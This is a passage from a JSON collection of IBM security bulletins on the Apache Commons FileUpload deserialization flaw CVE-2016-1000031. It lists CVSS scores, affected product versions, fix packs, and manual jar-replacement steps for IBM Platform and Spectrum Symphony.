the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Tivoli Netcool Impact**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Tivoli Netcool Impact 6.1.0| 6.1.0.0~6.1.0.4 \nIBM Tivoli Netcool Impact 6.1.1| 6.1.1.0~6.1.1.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation / First Fix** \n---|---|---|--- \nIBM Tivoli Netcool Impact 6.1.0| _6.1.0.4 IF1_| _None_| [IBM Tivoli Netcool Impact V6.1.0.4 Interim Fix 1](<http://www-01.ibm.com/support/docview.wss?uid=swg24044676>) \nIBM Tivoli Netcool Impact 6.1.1| _6.1.1.5 IF2_| _None_| [IBM Tivoli Netcool Impact V6.1.1.5 Interim Fix 2](<http://www-01.ibm.com/support/docview.wss?uid=swg24044700>) \n \n**Please also note the**** **[**_end of support announcement_**](<http://www-01.ibm.com/common/ssi/ShowDoc.wss?docURL=/common/ssi/rep_ca/8/897/ENUS917-138/index.html&lang=en&request_locale=en>)** ****from 12 September 2017 for selected Netcool product versions. You can find detailed information on whether the product version you have installed in your environment is affected by this end of service announcement by following the**** **[**_Netcool End of Support Knowledge Collection_**](<https://www-01.ibm.com/support/entdocview.wss?uid=swg22009231>)**. ****If your product version is affected, IBM recommend to upgrade your product version to the latest supported version of your product. Please contact your IBM account manager for any question you might have or for any assistance you may require for upgrading an end of service announced offering.**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:50:43", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool Impact is affected by an Open Source Apache Commons FileUpload vulnerability (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:50:43", "id": "ACE26206FFB4E9BFC947C91835F27A6EA2B5E8DF0FF6B0C69F358731D4D9C900", "href": "https://www.ibm.com/support/pages/node/568699", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:52:54", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Business Monitor. \nInformation about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the Security Bulletin [Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<https://www-01.ibm.com/support/docview.wss?uid=swg22011428>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Business Monitor V8.5.5, V8.5.6 and V8.5.7 \nIBM Business Monitor V8.0.1.3 \nIBM Business Monitor V8.0 \n \n\n\n**Principal Product and Versions**| **Affected Supporting Product and Versions** \n---|--- \nIBM Business Monitor V8.5.7 | WebSphere Application Server V8.5.5 \nIBM Business Monitor V8.5.6| WebSphere Application Server V8.5.5 \nIBM Business Monitor V8.5.5| WebSphere Application Server V8.5.5 \nIBM Business Monitor V8.0.1.3| WebSphere Application Server V8.0 \nIBM Business Monitor V8.0 | WebSphere Application Server V8.0 \n \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:56", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Monitor (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:56", "id": "65C6CEE2220BD8F2BF06A7DA52FAE31B05C72037D4DF4346A594A14F3DBA2AF1", "href": "https://www.ibm.com/support/pages/node/304981", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:42:17", "description": "## Summary\n\nSecurity vulnerability in Apache Commons FileUpload affects IBM Sterling B2B Integrator.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling B2B Integrator 5.2.0.1 - 5.2.6.3\n\n## Remediation/Fixes\n\n**PRODUCT & Version **\n\n| \n\n**APAR**\n\n| \n\n**Remediation/Fix** \n \n---|---|--- \n \nIBM Sterling B2B Integrator 5.2.0.1 - 5.2.6.3\n\n| IT24069 | \n\nApply Fix Pack 5020603_6 available on [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-05T00:53:36", "type": "ibm", "title": "Security Bulletin: Security Vulnerability in Apache Commons FileUpload Affects IBM Sterling B2B Integrator (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2020-02-05T00:53:36", "id": "6090C932221E51ADB229897A416B6CCCF4B92380897751F9E9E7D222C5B6F5AC", "href": "https://www.ibm.com/support/pages/node/717023", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:45", "description": "## Summary\n\nA vulnerability in Apache Commons FileUpload was addressed by IBM InfoSphere Information Server.\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in IBM InfoSphere Information Server, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 9.1, 11.3, and 11.5 \nIBM InfoSphere Information Server on Cloud version 11.5\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud| 11.5| [_JR58580_](<http://www.ibm.com/support/docview.wss?uid=swg1JR58580>)| \\--Apply IBM InfoSphere Information Server version [_11.5.0.2_](<http://www.ibm.com/support/docview.wss?uid=swg24043666>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_isf_ru9_services_engine_client_multi>) \nInfoSphere Information Server| 11.3| [_JR58580_](<http://www.ibm.com/support/docview.wss?uid=swg1JR58580>)| \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_isf_ru8_services_engine_client_multi>) \nInfoSphere Business Server| 9.1| [_JR58580_](<http://www.ibm.com/support/docview.wss?uid=swg1JR58580>)| \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_isf_ru13_services_engine_client_multi>) \n \n**Contact Technical Support:** \nIn the United States and Canada dial **1-800-IBM-SERV** \nView the support [_contacts for other countries_](<http://www.ibm.com/planetwide/>) outside of the United States. \nElectronically [_open a Service Request_](<http://www.ibm.com/software/support/probsub.html>) with Information Server Technical Support. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T14:17:42", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons FileUpload affects IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-16T14:17:42", "id": "C222A8A891F504F40C914F8F66ABB73F5EF9BD26F781A02F39DE0DB06449374A", "href": "https://www.ibm.com/support/pages/node/298795", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:51:43", "description": "## Summary\n\nA security vulnerability relating to remote code execution CVE-2016-1000031 has been reported against Apache Commons FileUpload DiskFileItem File Manipulation, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Commons FileUpload version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony. Commons FileUpload 1.3.3 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** CVE-2016-1000031 \n\n**DESCRIPTION:** A vulnerability in IBM Spectrum Symphony and IBM Platform Symphony could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \n\n**CVSS V3 Base Score:** **7.5 HIGH**\n\n**CVSS V3 Vector:** [_CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H_](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2016-1000031&vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) ([_legend_](<https://nvd.nist.gov/vuln-metrics/cvss>)) \n\n**CVSS V3 Impact Score:** 5.9 \n\n**CVSS V3 Exploitability Score:** 3.9\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document.** **For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\n\u00b7 **For IBM Platform Symphony 6.1.1, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI plc purger\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/\n\n \n> mkdir -p /tmp/perfbackup/ \n> mv $EGO_TOP/gui/1.2.8/lib/commons-fileupload-*.jar /tmp/guibackup \n> mv $EGO_TOP/perf/1.2.8/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/1.2.8/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/1.2.8/lib/\n\n1.5 On each management host, clean up the GUI work directory:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI plc purger\n\n\u00b7 **For IBM Platform Symphony 7.1 Fix Pack 1, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI plc purger\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/\n\n \n> mkdir -p /tmp/perfbackup/ \n> mv $EGO_TOP/gui/3.1/lib/commons-fileupload-*.jar /tmp/guibackup \n> rm $EGO_TOP/gui/soam/7.1/symgui/WEB-INF/lib/commons-fileupload-*.jar \n> mv $EGO_TOP/perf/3.1/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.1/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.1/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/soam/7.1/symgui/WEB-INF/lib/\n\n1.5 On each management host, clean up the GUI work directory:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI plc purger\n\n\u00b7 **For IBM Platform Symphony 7.1.1, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI ascd REST plc purger\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/ \n\n \n> mkdir -p /tmp/perfbackup/ \n> mv $EGO_TOP/gui/3.3/lib/commons-fileupload-*.jar /tmp/guibackup \n> rm $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar \n> rm $EGO_TOP/wlp/usr/servers/rest/apps/soam/7.1.1/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar \n> rm $EGO_TOP/asc/1.1.1/lib/commons-fileupload-*.jar \n> mv $EGO_TOP/perf/3.3/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.3/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.3/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/rest/apps/soam/7.1.1/deploymentrest/WEB-INF/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/asc/1.1.1/lib/\n\n1.5 On each management host, clean up the GUI work directories:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n> rm -rf $EGO_TOP/gui/workarea/*\n\n**NOTE**: If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory.\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI REST ascd plc purger\n\n\u00b7 **For IBM Spectrum Symphony 7.1.2, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI REST plc purger\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/ \n\n \n> mkdir -p /tmp/perfbackup/ \n> mv $EGO_TOP/gui/3.4/lib/commons-fileupload-*.jar /tmp/guibackup \n> rm $EGO_TOP/wlp/usr/servers/rest/apps/3.4/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar \n> mv $EGO_TOP/perf/3.4/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.4/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.4/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/rest/apps/3.4/deploymentrest/WEB-INF/lib/\n\n1.5 On each management host, clean up the GUI work directories:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n> rm -rf $EGO_TOP/gui/workarea/*\n\n**NOTE**: If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory.\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI REST plc purger\n\n\u00b7 **For IBM Spectrum Symphony 7.1.2 multi cluster, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/ \n\n \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/2.0/lib/commons-fileupload-*.jar /tmp/guibackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/gui/apps/2.0/lib/\n\n1.5 On each management host, clean up the GUI work directories:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n> rm -rf $EGO_TOP/gui/workarea/*\n\n**NOTE**: If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory.\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI\n\n\u00b7 **For IBM Spectrum Symphony 7.1.2 and IBM Spectrum Conductor with Spark 2.2 multi-head cluster, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location: \n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services: \n\n> egosh service stop WEBGUI REST plc purger \n\n1.3 For backup purposes, move the following files, which will be replaced by new files: \n\n> mkdir -p /tmp/guibackup/ \n\n> mkdir -p /tmp/perfbackup/ \n\n> mv $EGO_TOP/gui/3.5/lib/commons-fileupload-*.jar /tmp/guibackup\n\n> rm $EGO_TOP/wlp/usr/servers/rest/apps/3.5/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar\n\n> mv $EGO_TOP/perf/3.5/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory: \n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz \n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.5/lib/ \n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.5/lib/ \n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/rest/apps/3.5/deploymentrest/WEB-INF/lib/ \n\n1.5 On each management host, clean up the GUI work directories: \n\n> rm -rf $EGO_TOP/gui/work/* \n\n> rm -rf $EGO_TOP/gui/workarea/* \n\n**NOTE**: If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory. \n\n1.6 Launch a web browser and clear your browser cache. \n\n1.7 Start the following services: \n\n> egosh service start WEBGUI REST plc purger\n\n\u00b7 **For IBM Spectrum Symphony 7.2, follow these steps to upgrade to Commons FileUpload v1.3.3 on Linux hosts:**\n\n1.1 Log on to each management host in the cluster and download the **commons-fileupload-1.3.3-bin.tar.gz** package from the following location:\n\n<http://archive.apache.org/dist/commons/fileupload/binaries/commons-fileupload-1.3.3-bin.tar.gz>\n\n1.2 Stop the following services:\n\n> egosh service stop WEBGUI REST plc purger\n\n1.3 For backup purposes, move the following files, which will be replaced by new files:\n\n> mkdir -p /tmp/guibackup/ \n\n \n> mkdir -p /tmp/perfbackup/ \n> mv $EGO_TOP/gui/3.6/lib/commons-fileupload-*.jar /tmp/guibackup \n> rm $EGO_TOP/wlp/usr/servers/rest/apps/3.6/deploymentrest/WEB-INF/lib/commons-fileupload-*.jar \n> mv $EGO_TOP/perf/3.6/lib/commons-fileupload-*.jar /tmp/perfbackup/ \n\n1.4 On each management host, decompress the **commons-fileupload-1.3.3-bin.tar.gz** package and copy the following files to your cluster directory:\n\n> tar zxf commons-fileupload-1.3.3-bin.tar.gz\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/gui/3.6/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/perf/3.6/lib/\n\n> cp commons-fileupload-1.3.3-bin/commons-fileupload-1.3.3.jar $EGO_TOP/wlp/usr/servers/rest/apps/3.6/deploymentrest/WEB-INF/lib/\n\n1.5 On each management host, clean up the GUI work directories:\n\n> rm -rf $EGO_TOP/gui/work/*\n\n> rm -rf $EGO_TOP/gui/workarea/*\n\n**NOTE**: If you configured the **WLP_OUTPUT_DIR** parameter and **APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR** is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/**_webgui_hostname_**/gui/workarea/ directory.\n\n1.6 Launch a web browser and clear your browser cache.\n\n1.7 Start the following services:\n\n> egosh service start WEBGUI REST plc purger\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:38:58", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload DiskFileItem File Manipulation affects IBM Platform Symphony, IBM Spectrum Symphony (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-18T01:38:58", "id": "28CBA14F2DF9254C1445C1338480DCFC0CE9E7605EA9BC20FEE2942EF21E34C9", "href": "https://www.ibm.com/support/pages/node/632641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:53:02", "description": "## Summary\n\nThe Apache Commons FileUpload that is used by IBM\u00ae WebSphere\u2122 Application Server affects IBM SPSS Analytic Server. The potential threat could allow a remote attacker to execute arbitrary code on the system. The fix for this issue requires an update to the Websphere application server (detailed in another security bulletin) and an update to a specific IBM SPSS Analytic Server *.jar file.\n\n## Vulnerability Details\n\n**CVEID:** 